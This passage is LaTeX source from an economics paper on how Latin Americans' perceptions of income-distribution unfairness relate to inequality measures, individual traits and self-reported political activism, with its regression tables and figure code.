We calculate the correlation between unfairness perceptions and each inequality indicator at the regional level using three alternative aggregation methods. First, we calculate each correlation using the individual-level data and pooling all countries and years in our sample (columns 1-3). Second, we calculate the average unfairness views in each country-year and then calculate the correlation between each inequality indicator and the average fairness views in the corresponding country-year (columns 4-6). Third, we calculate the correlation between each inequality indicator and fairness views over time for each country separately (using the individual-level data) and then average the correlations across countries (columns 7-9). Table \ref{tab-rel-fairness} shows the results.
Fairness views tend to be positively correlated with relative indicators and negatively correlated with absolute ones. In Table \ref{tab-rel-fairness}, column 1 shows that the Gini is the indicator with the highest linear correlation. On the other hand, the absolute indicators of inequality tend to be \textit{negatively} correlated with unfairness perceptions, and the magnitude of such correlations tends to be small. The high correlation between unfairness perceptions and income inequality seems to be driven by the population that perceives inequality as very unfair (columns 2, 5, and 8), rather than just unfair (columns 3, 6, and 9).\footnote{It is interesting to note that indicators sometimes mentioned in the mass media, such as the ratio between the richest 90\% and the poorest 10\%, exhibit low explanatory power. This may be due to mismeasurement of top incomes in household surveys.}
These results are consistent with experimental evidence from \cite{amiel1992measurement,amiel1999thinking}, who show that support for the scale-invariance axiom is greater than for translation invariance, reflecting greater support for relative inequality indicators.
\section{Individual-level Fairness Determinants} \label{sec_corr_fairness}
In this section, we study the individual-level correlates of fairness views. The purpose of this section is twofold. First, to assess whether the association between fairness views and income inequality is robust to including controls. Second, to investigate which individual-level characteristics are systematically related to fairness views.
\subsection{Empirical Design}
To assess the relationship between individuals' characteristics and fairness perceptions, we estimate two-way fixed effects Logit models. This design controls for two important sources of heterogeneity that could drive the positive association between inequality and fairness perceptions documented in the previous section. First, it controls for country-level heterogeneity. This could matter if, for example, countries with historically extractive institutions have both higher levels of income inequality and more negative fairness views as a legacy of such institutions. Insofar as institutions are stable over time, the country fixed effects deal with this potential bias. Second, the design controls for year-level heterogeneity. This is important if, for example, in some particular years, macroeconomic events such as a financial crisis or a corruption scandal increase income disparities and worsen fairness views, again generating a spurious correlation between inequality and fairness perceptions. Including year fixed effects helps to alleviate such concerns.
Given that changes in fairness views over the last decade were driven by the share of the population that perceived the income distribution as very unfair (Figure \ref{fig-fairness-views}), in our baseline specification, we focus on explaining the determinants of this variable, although we also show the results for a broader definition of unfairness. We assume that unfairness perceptions can be characterized according to the following equation:
\begin{align} \label{eq_fairness}
\text{VeryUnfair}_{ict} = F(\lambda_c + \lambda_t + \gamma \text{Gini}_{ct} + \beta x_{ict}),
\end{align}
where the dependent variable, $\text{VeryUnfair}_{ict}$ is equal to one if individual $i$ believes that the income distribution of country $c$ during year $t$ is very unfair and zero otherwise. Equation \eqref{eq_fairness} includes country fixed effects, $\lambda_{c}$; year fixed effects, $\lambda_t$; the country's Gini coefficient in year $t$, $\text{Gini}_{ct}$; and a vector of individual characteristics, $x_{ict}$, that contains age, age squared, sex, marital status, education, employment status, an assets index, political ideology, and religious views.\footnote{The assets index takes the value one if individual $i$ has access to running water and sewerage, owns a computer, a washing machine, a telephone, and a car. In household surveys, these variables tend to be correlated with household income, although the correlation is usually small. Unfortunately, we do not observe household income in the Latinobar\'ometro data. To measure political views, we rely on the question \textit{``In politics, people normally speak of ``left'' and ``right.'' On a scale where 0 is left and 10 is right, where would you place yourself?''} We interpret values closer to zero (ten) as closer to a liberal (conservative) worldview. We measure religious views using a dummy that is equal to one if individual $i$ is a Catholic ---the predominant religion in the region---coding other religions (and lack of religion) as zero.} In our baseline specification, $F(\cdot)$ is the logistic function. We cluster the standard errors at the country-by-year level.
We are interested in $\frac{\partial \text{VeryUnfair}_{ict}}{\partial x_{ict}} = \beta f(\cdot)$ and $\frac{\partial \text{VeryUnfair}_{ict}}{\partial \text{Gini}_{ict}} = \gamma f(\cdot)$. The first of these partial derivatives captures the relationship between an individual characteristic and unfairness perceptions, controlling for the rest of the characteristics, the Gini, and the fixed effects. Similarly, $\gamma f(\cdot)$ measures the relationship between the Gini and perceived fairness after controlling for individual-level traits and fixed effects. The magnitude of the partial derivatives depends on the value at which covariates are evaluated. We compute the marginal effects by evaluating all covariates at their average value.
\subsection{Regression Results}
Table \ref{very_unfair_logit} shows the estimated marginal effects under different specifications. Column 1 presents the results controlling only for the fixed effects and the Gini coefficient. Column 2 includes basic demographic indicators (age, gender, and marital status). Column 3 includes dummies for maximum educational attainment (the omitted category is completing up to elementary school). Column 4 includes dummies for labor force participation and unemployment. Column 5 includes an index for access to basic services and asset ownership. Column 6 includes political and religious views.
Consistent with the evidence shown in Section \ref{sec_ineq_fairness}, the Gini is positively and statistically significantly related to unfairness perceptions. In a country with average characteristics, a one point decrease in the Gini (from 0.49 to 0.48) decreases the share of the population that believes that the income distribution is very unfair by about half a percentage point ($p < 0.01$). This magnitude does not vary much across specifications (columns 1--6).\footnote{It is important to stress that the interpretation is not necessarily causal. The relationship between income inequality and unfairness perceptions can go both ways. On the one hand, higher inequality can increase the share of the population that believes the distribution is very unfair. But as more people perceive inequality as very unfair, the income distribution can change through several channels (e.g., more corruption or social unrest).}
Several individual-level characteristics predict fairness views. Older people are more likely to perceive the income distribution as very unfair, although the relationship between age and unfairness perception is non-linear. On average, males are just as likely as females to perceive the income distribution as very unfair, while married individuals are slightly less likely to do so. Completing high school is negatively associated with perceptions of unfairness, although the magnitude of the coefficient is small. Being economically active does not seem to be correlated with unfairness views, but being unemployed does. On average, unemployed individuals are about two percentage points more likely to perceive the income distribution as unfair than the employed population. The coefficient on the assets index is negative, suggesting that relatively better-off individuals are less likely to view the income distribution as very unfair, although the coefficient is not statistically different from zero. Ideologically conservative people are statistically less likely to perceive the income distribution as very unfair, although the effect size is small (below half a percentage point). Finally, Catholics are less likely to perceive the income distribution as very unfair.
\subsection{Robustness}
We conduct three robustness checks. First, we use a broader measure of unfairness that equals one if an individual perceives the income distribution as unfair \textit{or} very unfair as the dependent variable in equation \eqref{eq_fairness}. Appendix Table \ref{unfair_logit} shows the results. The magnitude of the coefficient on the Gini is smaller relative to our baseline specification. Given the relatively large standard errors, the 95\% confidence interval on the Gini includes zero; but the interval also contains the estimated marginal effects in our baseline set of regressions (Table \ref{very_unfair_logit}). In other words, when we use the broader measure of unfairness, our estimates become less informative. This is because strong unfairness views are more strongly correlated with income inequality than weak unfairness views (Table \ref{tab-rel-fairness} and Figure \ref{fig-fairness-gini}).\footnote{The coefficients of some individual-level characteristics are also different when using the broader definition of unfairness views. The effect of completing college on perceptions of unfairness becomes strong and statistically significant. Civil status stops being statistically significant, while the male dummy becomes negative and statistically significant (in both cases consistently so across specifications). The coefficient on the assets index becomes larger and statistically different from zero. Finally, the effect of political ideology and religious views becomes statistically indistinguishable from zero. These results suggest that the population that perceives the income distribution as very unfair tends to be different in observable variables than the population that believes that the income distribution is merely unfair.}
As a second robustness check, we estimate an analogous specification to the one in column 6 of Table \ref{very_unfair_logit}, but controlling for inequality indicators other than the Gini coefficient. Appendix Table \ref{unfair_ineq_logit} shows the results. We find a positive correlation between income inequality and unfairness perceptions across all relative measures of inequality (columns 1--4). The Gini calculated without households with zero income, the Atkinson index, the Theil index, and the Generalized Entropy indicator are consistently correlated with unfairness, and all the coefficients are statistically different from zero at the usual levels. In contrast, the absolute Gini (the only absolute inequality indicator in the table) is negatively correlated with unfairness perceptions, although the coefficient is statistically indistinguishable from zero.
As a final robustness check, we estimate equation \eqref{eq_fairness} using a linear probability model (LPM) instead of a Logit. The choice of a LPM is consistent with the visual evidence shown in Figure \ref{fig-fairness-gini}, Panel A, where fairness views seem to be linearly related to the Gini coefficient. Appendix Table \ref{very_unfair_lpm} shows the results. The estimates are quite similar across specifications. For example, in the specification with the larger set of controls (column 6), the marginal effect of the Gini coefficient is 0.68 in the Logit model and 0.63 in the LPM.
\subsection{Decomposing Changes in Fairness Views Over Time}
Both income inequality and individual-level characteristics are associated with fairness perceptions. Next, we ask which of these two factors mainly explain (in an accounting sense) the reduction in unfairness beliefs over the 2000s. To do this, we perform a Oaxaca-Blinder decomposition, taking 2002 and 2013 as the two groups to be compared (see Appendix \ref{sec_oaxaca} for details on the Oaxaca-Blinder decomposition). In the decomposition, we use the broad definition of unfairness perceptions as the dependent variable and include controls for demographics, educational attainment, employment status, assets, political views, and religion. Figure \ref{fig-oaxaca} summarizes the results.
During 2002--2013, the share of the population perceiving the distribution as unfair decreased 14 percentage points, from 87\% to 73\%. The decomposition suggests that about 28\% of this change (4 percentage points) is accounted for by changes in the elasticity of fairness views to each covariable (i.e., changes in the values of the coefficients in the regression), while the other 72\% can be explained by changes in the covariables' values. Among the covariables included in the decomposition, the one that mainly explains the decline in unfairness perceptions is the change in the Gini, which accounts for 88.9\% of the explained component. In contrast, changes in the composition of the population only account for 11.1\% of the explained component. This result suggests that the decline in unfairness views during the 2000s in Latin America was mainly driven by changes in income inequality and not by changes in the composition of the population.
\section{The Predictive Power of Fairness Views for Social Unrest} \label{sec_unrest}
There is a vast literature that relates economic inequality---and more recently, measures of polarization---to social cohesion, conflict, and activism.\footnote{For instance, \cite{gasparini2008income} find a strong empirical correlation between inequality and conflict in Latin America. Most previous studies linking inequality and conflict are based on cross-country regressions, and therefore have a notably smaller sample size than our paper.} Arguably, the relationship between income inequality and conflict is partly mediated by fairness views. That is, many individuals mobilize in part because they believe existing inequities are unfair. However, a given level of income inequality might not be seen as unfair by some individuals due to, for example, misperceptions of the actual level of inequality \citep{gimpelson2018misperceiving} or a perception that income gaps are mainly driven by differences in effort \citep{alesina2001doesn}. For these reasons, a regression that links social unrest to income inequality can contain substantial measurement error. We sidetrack these issues by directly measuring the link between social unrest and fairness views.
We measure propensity to engage in social unrest using the opinion polls data. For several political activities, Latinobar\'ometro asks respondents whether they (i) have ever done the activity; (ii) would do the activity; or (iii) would never do the activity. We investigate eight different types of demonstrations: making a complaint on social media, making a complaint to the media, signing a petition, protesting with authorization, protesting without authorization, refusing to pay taxes, participating in riots, and occupying land, factories or buildings. We also create a composite index of political participation which takes the value one if the individual engaged in tax evasion, an illegal protest, signed a petition, or complained to the media, and zero otherwise.\footnote{We use those four measures to construct the index because we do not have data on the other political activities during 2015. Other years have data on fewer political activities.} Participation in these activities is self-reported. Given that respondents had no financial incentives for truth-telling, our results should be taken with caution.
For each activity (and the index), we consider two measures of social unrest. First, we use an indicator that takes the value one if an individual says she has done the activity in the past and zero otherwise. Second, we use an indicator that takes the value one if the individual did the activity in the past \textit{or} says that she is willing to do the activity. We use these measures as dependent variables in Logit regressions. The regressions control for unfairness perceptions, the Gini, and individual-level covariates. Unfortunately, participation in political activities is available only in a few years, so our sample size for these regressions is substantially smaller.
Table \ref{very_unfair_unrest_past}, Panel A shows that unfairness perceptions correlate with participating in political activities in the past. We find positive and statistically significant effects for complaining on social media (column 1) and signing a petition (column 3). Conditional on income inequality, individuals who perceive the income distribution as very unfair are 1.6 percentage points more likely to have complained through social media in the past (from a baseline of 7.8\%) and 1.3 percentage points more likely to have signed a petition in the past (from a baseline of 18.6\%). The rest of the effects tend to be positive, although not statistically different from zero. Conditional on fairness views, we find a statistically significant correlation between the Gini and complaining on social media (column 1), taking part in an authorized demonstration (column 5), and the composite index (column 9). The effect of income inequality on the rest of the activities is statistically indistinguishable from zero.
Table \ref{very_unfair_unrest_past}, Panel B shows the results when the dependent variable also includes the willingness to participate in the political activities. The set of political activities predicted by fairness views are somewhat different than in Panel A. In Panel B, we find positive and statistically significant effects for complaining through media (either social media or traditional media, columns 1 and 2, respectively) and refusing to pay taxes (column 6). The magnitude of the coefficients that are statistically significant tends to be larger than in the baseline specification. For example, the effect of unfairness views on the propensity to complain on social media is twice as large in Panel B than in Panel A (3.3 vs. 1.6 percentage points, correspondingly). Finally, we find that---holding fairness views constant---income inequality is predictive of refusing to pay taxes (column 4). The effect of income inequality on the rest of the political activities is not statistically different from zero.
Taken together, these results show that there are political activities for which fairness views and income inequality have predictive power independent of each other (like complaining through social media). However, there are also activities that are exclusively predicted by income inequality (like participating in an unauthorized protest) or fairness views (like signing a petition). This suggests that both fairness views and income inequality capture different channels through which changes in the income distribution can affect social unrest.
\section{Conclusions} \label{sec_conclusions}
In this paper, we analyze perceptions of distributive justice in a context of falling income inequality. We show that fairness beliefs moved in line with the evolution of objective inequality indicators: both unfairness perceptions and income inequality declined across countries and over time in our sample. Some individual-level characteristics, such as employment status and political ideology, are systematically correlated with fairness views. Fairness views have predictive power for self-reported propensity to mobilize above and beyond income inequality (and vice-versa).
Our findings are relevant for both researchers and policymakers. For researchers, our results suggest that, in some contexts, one can proxy fairness views using relative measures of income inequality, such as the widely used Gini coefficient. This is reassuring since inequality measures are much more widely available than fairness views in standard datasets.
For policymakers, our findings warn about concerning levels of dissatisfaction with existing income disparities. Three in four Latin Americans believe that the income distribution is unfair, and such perceptions have proved to be relatively inelastic to a large compression of the income distribution by historical standards. If fairness perceptions are interpreted as preferences for some leveling of income, our results indicate that a striking majority is in favor of reducing the existing disparities between the rich and the poor, while relatively few people believe that income disparities should remain the same. A second actionable insight for policymakers is that fairness views act as a thermometer of individuals' latent propensity to engage in political activities. Thus, if policymakers want to prevent social unrest, they ought to pay attention to the evolution of fairness views and take preventive measures before the majority of people perceive the income distribution as unfair.
A caveat with our results is that we cannot tell whether most individuals believe that the income distribution is unfair because (i) they have inaccurate views about the level of income inequality (perhaps, believing that income is more unequally distributed than it objectively is); or (ii) individuals accurately assess the level of inequality and believe that existing inequities are unfair (perhaps, because the process that generates income differences is not fair or because existing inequities are too large). Disentangling the contribution of these and other channels is a challenge for future research.
\section*{Tables and Figures}
\begin{table}[htbp]{\footnotesize
\begin{center}
\caption{Correlation between inequality indicators and fairness views, 1997-2015}\label{tab-rel-fairness}
\begin{tabular}{lccccccccccc}
\midrule
& \multicolumn{3}{c}{} & & \multicolumn{3}{c}{} & & \multicolumn{3}{c}{Averaging correlations} \\
& \multicolumn{3}{c}{Individual-level data} & & \multicolumn{3}{c}{Country-by-year level data} & & \multicolumn{3}{c}{across countries} \\
\cmidrule{2-4}\cmidrule{6-8}\cmidrule{10-12} & U./V.U. & V.U. & U. & & U./V.U. & V.U. & U. & & U./V.U. & V.U. & U. \\
& (1) & (2) & (3) & & (4) & (5) & (6) & & (7) & (8) & (9) \\
\midrule
Gini coefficient & 0.39 & 0.36 & 0.10 & & 0.84 & 0.82 & 0.25 & & 0.39 & 0.28 & 0.15 \\
& (0.07) & (0.07) & (0.09) & & (0.10) & (0.16) & (0.35) & & (0.07) & (0.07) & (0.09) \\
Theil index & 0.39 & 0.38 & 0.05 & & 0.85 & 0.82 & 0.27 & & 0.33 & 0.20 & 0.18 \\
& (0.07) & (0.07) & (0.09) & & (0.09) & (0.16) & (0.35) & & (0.07) & (0.07) & (0.09) \\
Atkinson, A(0.5) & 0.38 & 0.35 & 0.10 & & 0.84 & 0.82 & 0.25 & & 0.37 & 0.26 & 0.15 \\
& (0.07) & (0.07) & (0.09) & & (0.10) & (0.16) & (0.35) & & (0.07) & (0.07) & (0.09) \\
Atkinson, A(1) & 0.36 & 0.30 & 0.13 & & 0.84 & 0.82 & 0.25 & & 0.38 & 0.28 & 0.13 \\
& (0.07) & (0.08) & (0.09) & & (0.10) & (0.16) & (0.34) & & (0.07) & (0.08) & (0.09) \\
Mean log deviation & 0.35 & 0.29 & 0.14 & & 0.84 & 0.82 & 0.25 & & 0.38 & 0.28 & 0.13 \\
& (0.07) & (0.08) & (0.09) & & (0.10) & (0.16) & (0.34) & & (0.07) & (0.08) & (0.09) \\
Coefficient Variation & 0.33 & 0.36 & 0.00 & & 0.78 & 0.78 & 0.19 & & 0.18 & 0.20 & 0.10 \\
& (0.08) & (0.08) & (0.09) & & (0.13) & (0.16) & (0.36) & & (0.08) & (0.08) & (0.09) \\
Ratio 75/25 & 0.29 & 0.15 & 0.24 & & 0.80 & 0.78 & 0.26 & & 0.36 & 0.29 & 0.12 \\
& (0.07) & (0.09) & (0.08) & & (0.11) & (0.17) & (0.33) & & (0.07) & (0.09) & (0.08) \\
Generalized entropy & 0.29 & 0.35 & -0.04 & & 0.80 & 0.72 & 0.35 & & 0.18 & 0.09 & 0.19 \\
& (0.05) & (0.08) & (0.08) & & (0.11) & (0.18) & (0.34) & & (0.05) & (0.08) & (0.08) \\
Ratio 90/10 & 0.23 & 0.10 & 0.21 & & 0.81 & 0.79 & 0.25 & & 0.30 & 0.30 & 0.07 \\
& (0.07) & (0.08) & (0.08) & & (0.11) & (0.17) & (0.32) & & (0.07) & (0.08) & (0.08) \\
Variance & -0.08 & -0.01 & -0.12 & & -0.25 & 0.10 & -0.71 & & -0.06 & 0.04 & -0.12 \\
& (0.07) & (0.08) & (0.08) & & (0.39) & (0.43) & (0.14) & & (0.07) & (0.08) & (0.08) \\
Absolute Gini & -0.21 & -0.10 & -0.18 & & -0.71 & -0.46 & -0.64 & & -0.18 & -0.10 & -0.22 \\
& (0.09) & (0.10) & (0.08) & & (0.23) & (0.26) & (0.31) & & (0.09) & (0.10) & (0.08) \\
Kolm, K(1) & -0.31 & -0.18 & -0.22 & & -0.80 & -0.64 & -0.50 & & -0.22 & -0.16 & -0.22 \\
& (0.09) & (0.10) & (0.08) & & (0.12) & (0.18) & (0.37) & & (0.09) & (0.10) & (0.08) \\
\midrule
\end{tabular}
\end{center}
\begin{singlespace} \vspace{-.5cm}
\noindent \justify \textbf{Notes:} This table presents correlations between fairness views and income inequality. In columns 1--3, we calculate the correlations at the individual-level pooling all countries and years in our sample. In columns 4--6, we calculate the average unfairness views in each country-year and then calculate the correlation between each inequality indicator in the corresponding country-year and the average fairness views. In columns 7--9, we calculate the correlation between each inequality indicator and fairness views over time for each country separately (using the individual-level data) and then average the correlations across countries. U./V.U. stands for ``Unfair or Very Unfair''; V.U. stands for ``Very Unfair''; and U. stands for ``Unfair.'' Boostrapped standard errors are in parenthesis.
\end{singlespace}
}
\end{table}
\clearpage
\begin{table}[htpb!]{\footnotesize
\begin{center}
\caption{Logit regressions of unfairness perceptions (very unfair) and individuals' characteristics} \label{very_unfair_logit}
\newcommand\w{1.30}
\begin{tabular}{l@{}lR{\w cm}@{}L{0.43cm}R{\w cm}@{}L{0.43cm}R{\w cm}@{}L{0.43cm}R{\w cm}@{}L{0.43cm}R{\w cm}@{}L{0.43cm}R{\w cm}@{}L{0.43cm}}
\midrule
&& \multicolumn{12}{c}{Dependent Variable: Believes income distribution is very unfair} \\\cmidrule{3-14}
&& (1) && (2) && (3) && (4) && (5) && (6) \\
\midrule
\ExpandableInput{results/very_unfair_logit}
\midrule
\end{tabular}
\end{center}
\begin{singlespace} \vspace{-.5cm}
\noindent \justify \textbf{Notes:} This table shows estimates of the relationship between an indicator that equals one for individuals who believe that the income distribution is very unfair and the Gini coefficient controlling for individuals' characteristics. Coefficients are estimated through Logit regressions and represent the marginal effects evaluated at the mean values of the rest of the variables. Observations are weighted by the individual's probability of being interviewed. All specifications include country and year fixed effects. $^{***}$, $^{**}$ and $^*$ denote significance at 10\%, 5\% and 1\% levels, respectively. Heteroskedasticity-robust standard errors clustered at the country-by-year level in parentheses.
\end{singlespace}
}
\end{table}
\begin{landscape}
\begin{table}[htpb!]{\footnotesize
\begin{center}
\caption{Logit regressions of unfairness perceptions (very unfair) and activism}\label{very_unfair_unrest_past}
\newcommand\w{1.58}
\begin{tabular}{l@{}lR{\w cm}@{}L{0.43cm}R{\w cm}@{}L{0.43cm}R{\w cm}@{}L{0.43cm}R{\w cm}@{}L{0.43cm}R{\w cm}@{}L{0.43cm}R{\w cm}@{}L{0.43cm}R{\w cm}@{}L{0.43cm}R{\w cm}@{}L{0.43cm}R{\w cm}@{}L{0.43cm}}
\midrule
&& Complain && && && && && Refuse && && Occupy && Activism \\
&& on social && Complain && Sign a && Authorized && Unauth. && to pay && Participate && land or && composite \\
&& media && to media && petition && protest && protest && taxes && in riots && buildings && index \\
&& (1) && (2) && (3) && (4) && (5) && (6) && (7) && (8) && (9) \\
\midrule
\addlinespace
\multicolumn{14}{l}{\hspace{-1em} \textbf{Panel A.\ Dependent variable: Have done the activity in the past}} \\
\midrule
\ExpandableInput{results/very_unfair_unrest_past}
\midrule
\addlinespace
\multicolumn{14}{l}{\hspace{-1em} \textbf{Panel B.\ Dependent variable: Have done the activity in the past or would do the activity}} \\
\midrule
\ExpandableInput{results/very_unfair_unrest_would}
\midrule
\addlinespace
\ExpandableInput{results/very_unfair_unrest_past_N}
\midrule
\end{tabular}
\end{center}
\begin{singlespace}
\noindent \justify \textbf{Notes:} This table shows estimates of the determinants of participating in the political activity listed in the column header. Coefficients are estimated through Logit regressions and represent the marginal effects evaluated at the mean values of the rest of the variables. Observations are weighted by the individual's probability of being interviewed. All specifications control for age, age squared, gender, marital status, maximum educational attainment, labor force participation, unemployment status, assets index, political ideology, and religion. The regression in column 3 also controls for country and year fixed effects. Column 9 shows a composite index which takes the value one if the individual reports having engaged in tax evasion, an illegal protest, signed a petition, or complained in the media, and zero otherwise. The rest of the political activities are available in only one year and thus we cannot include fixed effects. Participation in political activities is self-reported. $^{***}$, $^{**}$ and $^*$ denote significance at 10\%, 5\% and 1\% levels, respectively. Heteroskedasticity-robust standard errors clustered at the country-by-year level in parentheses.
\end{singlespace}
}
\end{table}
\end{landscape}
\clearpage
\begin{figure}[htp]{\scriptsize
\begin{centering}
\protect\caption{Fairness views in Latin America over time and across countries} \label{fig-fairness-views}
\begin{minipage}{.48\textwidth}
\caption*{Panel A. Fairness views over time \\ (1997--2015)}\label{fig-fairness-views-time}
\includegraphics[width=\linewidth]{results/fig-intensity-fairness}
\end{minipage}\hspace{1em}
\begin{minipage}{.48\textwidth}
\caption*{Panel B. Fairness views across countries \\ (2003 vs. 2013)} \label{fig-fairness-views-countries}
\includegraphics[width=\linewidth]{results/fig-chg-fairness-0213}
\end{minipage}
\par\end{centering}
\singlespacing\justify
\textbf{Notes}: \footnotesize Panel A shows the percentage of individuals who perceive the income distribution as very unfair, unfair, fair, and very fair in our sample. We calculate the shares as the unweighted average of fairness views across the 18 countries in our sample. Panel B presents the percentage of the population who perceives the income distribution as either unfair or very unfair in 2002 and 2013 in each country of our sample.
}
\end{figure}
\clearpage
\begin{figure}[htpb]
\caption{Fairness views and income inequality in Latin America} \label{fig-fairness-gini}
\centering
\begin{subfigure}[t]{0.48\textwidth}
\caption*{Panel A. Correlation between unfairness views and Gini}\label{fig-binscatter-gini-unfair}
\centering
\includegraphics[width=\linewidth]{results/fig-binscatter-gini-unfair-all}
\end{subfigure}
\hfill
\begin{subfigure}[t]{0.48\textwidth}
\caption*{Panel B. Change in fairness and Gini across countries} \label{fig-chg-gini-unfair-0213}
\includegraphics[width=\linewidth]{results/fig-chg-gini-unfair-0213}
\end{subfigure}
\hfill
{\footnotesize
\singlespacing \justify
\textbf{Notes:} Panel A shows a binned scatterplot of fairness views and the Gini coefficient. To construct this figure, we group the Ginis of all country-years in bins of width equal to 0.02 Gini points and calculate the average fairness perceptions in each bin.
Panel B plots the percentage point change between 2002 and 2013 in the share of the population that believes that the income distribution is either unfair or very unfair ($y$-axis) against the change in the Gini coefficient between 2002 and 2013 ($x$-axis) for countries in our sample. Due to a break in data comparability or household data unavailability, for some countries, we use inequality data from adjacent years. In 2002, we use: Argentina 2004, Chile 2003, Costa Rica 2010, Ecuador 2003, Guatemala 2006, Nicaragua 2001, Panama 2008, and Peru 2004. In 2013 we use: Guatemala 2014, Mexico 2014, Nicaragua 2014, and Venezuela 2012. See Appendix \ref{sec_data} for more details.
}
\end{figure}
\clearpage
\begin{figure}[htp]
\caption{Oaxaca-Blinder decomposition of unfairness perceptions, 2002-2013}\label{fig-oaxaca} \centering
\centering
\includegraphics[width=.75\linewidth]{results/fig-oaxaca-0213.png}
\hfill
{\footnotesize
\singlespacing \justify
\textbf{Notes:} This figure presents estimates of the Oaxaca-Blinder decomposition (see Appendix \ref{sec_oaxaca}). The dependent variable is an indicator that equals one for individuals who believe that the income distribution is unfair or very unfair. The regressors in the decomposition include the Gini coefficient, age, age squared, and dummy variables for marital status, gender, educational attainment, labor force participation, unemployment status, an assets index, political ideology, and religious views. The ``explained'' part of the results refers to changes in the value of the covariables, while the ``unexplained'' refers to changes in the coefficients and the interaction terms.
}
\end{figure}
\section{Additional Figures and Tables} \label{app_add_figs}
\setcounter{table}{0}
\setcounter{figure}{0}
\setcounter{equation}{0}
\renewcommand{\thetable}{A\arabic{table}}
\renewcommand{\thefigure}{A\arabic{figure}}
\renewcommand{\theequation}{A\arabic{equation}}
\begin{figure}[htpb]
\caption{Perceptions of unfairness and individual characteristics, 1997--2015} \label{fig-fairness-grps}
\centering
\begin{subfigure}[t]{.48\textwidth}
\caption*{Panel A. By age}\label{fig-fairness-age}
\centering
\includegraphics[width=\linewidth]{results/fig-fairness-age}
\end{subfigure}
\hfill
\begin{subfigure}[t]{0.48\textwidth}
\caption*{Panel B. By sex}\label{fig-fairness-sex}
\centering
\includegraphics[width=\linewidth]{results/fig-fairness-sex}
\end{subfigure}
\hfill
\begin{subfigure}[t]{.48\textwidth}
\caption*{Panel C. By educational attainment}\label{fig-fairness-educ}
\centering
\includegraphics[width=\linewidth]{results/fig-fairness-educ}
\end{subfigure}
\hfill
\begin{subfigure}[t]{0.48\textwidth}
\caption*{Panel D. By employment status}\label{fig-fairness-employ}
\centering
\includegraphics[width=\linewidth]{results/fig-fairness-employ}
\end{subfigure}
\hfill
{\footnotesize
\singlespacing \justify
\textbf{Notes:} This figure shows the share of individuals who perceive the income distribution as unfair or very unfair according to their age, gender, maximum educational attainment, and employment status.
}
\end{figure}
\clearpage
\begin{figure}[htp]
\caption{The evolution of fairness views and income inequality in Latin America}\label{fig-timeseries-gini-unfair} \centering
\centering
\includegraphics[width=.75\linewidth]{results/fig-timeseries-gini-unfair}
\hfill
{\footnotesize
\singlespacing \justify
\textbf{Notes:} This figure shows the evolution of the average Gini coefficient across countries in our sample (right-hand-side variable) and the fraction of the population who perceive the income distribution as unfair or very unfair (left-hand-side variable) over 1997--2015. To have a balanced panel of countries over time, we linearly extrapolated the Gini coefficient in years in which income microdata is not available (see Appendix \ref{sec_data}).
}
\end{figure}
\clearpage
\begin{table}[H]{\footnotesize
\begin{center}
\caption{Descriptive statistics of our sample} \label{tab-sum-stats}
\begin{tabular}{lccc}
\midrule
& Mean & Standard Dev. & Observations \\
& (1) & (2) & (3) \\
\midrule
\textbf{\hspace{-1em} Panel A. Sociodemographic} & & & \\
Age & 39.75 & 16.23 & 225,551 \\
Male (\%) & 48.97 & 0.50 & 225,567 \\
Married or civil union (\%) & 56.27 & 0.50 & 224,081 \\
Catholic religion (\%) & 68.01 & 0.47 & 222,790 \\
Ideology (10 = right-wing) & 5.48 & 2.64 & 131,980 \\
\textbf{\hspace{-1em} Panel B. Education and Labor market} & & & \\
Literate (\%) & 90.31 & 0.30 & 224,056 \\
Secondary education or more (\%) & 33.65 & 0.47 & 224,056 \\
Parents with secondary education (\%) & 17.43 & 0.38 & 184,884 \\
Economically active (\%) & 64.14 & 0.48 & 225,222 \\
Unemployed (\% Labor Force) & 9.89 & 0.30 & 225,222 \\
\textbf{\hspace{-1em} Panel C. Access to services} & & & \\
Access to a sewerage (\%) & 69.59 & 0.46 & 222,530 \\
Access to running water (\%) & 88.83 & 0.31 & 204,340 \\
\textbf{\hspace{-1em} Panel D. Asset ownership} & & & \\
Car (\%) & 28.21 & 0.45 & 222,338 \\
Computer (\%) & 33.79 & 0.47 & 222,645 \\
Fridge (\%) & 79.22 & 0.41 & 146,686 \\
Homeowner (\%) & 73.92 & 0.44 & 223,603 \\
Mobile (\%) & 80.61 & 0.40 & 172,253 \\
Washing machine (\%) & 54.71 & 0.50 & 223,122 \\
Landline (\%) & 42.28 & 0.49 & 222,968 \\
\midrule
\end{tabular}
\end{center}
\begin{singlespace} \vspace{-.5cm}
\noindent \justify \textbf{Note:} This table shows summary statistics on our sample pooling data from all countries in our sample over 1997--2015.
\end{singlespace}
}
\end{table}
\clearpage
\begin{table}[H]{\footnotesize
\begin{center}
\caption{Fairness views by population group} \label{tab-fairness-grp}
\newcommand\w{1.70}
\begin{tabular}{l@{}R{\w cm}R{\w cm}R{\w cm}R{\w cm}}
\midrule
& \multicolumn{4}{c}{\% of individuals who believe income distribution is:} \\
\cmidrule{2-5} & Very unfair & Unfair & Fair & Very fair \\
& (1) & (2) & (3) & (4) \\
\midrule
All & 28.2 & 51.6 & 17.3 & 2.9 \\
\textbf{\hspace{-1em} Panel A. Gender} & & & & \\
Female & 28.3 & 52.2 & 16.7 & 2.8 \\
Male & 28.0 & 51.1 & 17.9 & 3.0 \\
\textbf{\hspace{-1em} Panel B. Age group} & & & & \\
15-24 & 25.2 & 52.0 & 19.7 & 3.1 \\
25-40 & 28.5 & 51.3 & 17.2 & 3.0 \\
41-64 & 29.5 & 51.7 & 16.0 & 2.8 \\
65+ & 29.2 & 51.6 & 16.6 & 2.5 \\
\textbf{\hspace{-1em} Panel C. Civil status} & & & & \\
Married & 28.3 & 51.9 & 17.0 & 2.8 \\
Not married & 27.9 & 51.4 & 17.7 & 3.1 \\
\textbf{\hspace{-1em} Panel D. Religion} & & & & \\
Catholic & 28.2 & 51.7 & 17.2 & 2.9 \\
Not catholic & 28.0 & 51.5 & 17.5 & 3.0 \\
\textbf{\hspace{-1em} Panel E. Education level} & & & & \\
Less than Primary & 27.7 & 51.6 & 17.7 & 3.0 \\
Complete Primary & 27.9 & 52.2 & 17.4 & 2.6 \\
Complete Secondary & 29.1 & 53.2 & 15.0 & 2.7 \\
Complete Tertiary & 29.0 & 50.8 & 17.1 & 3.1 \\
\textbf{\hspace{-1em} Panel F. Type of employment} & & & & \\
Employee & 28.3 & 51.5 & 17.2 & 2.9 \\
Employer & 24.3 & 53.9 & 19.0 & 2.8 \\
Self-employed & 28.0 & 51.4 & 17.5 & 3.1 \\
Unemployed & 30.3 & 51.6 & 15.1 & 3.0 \\
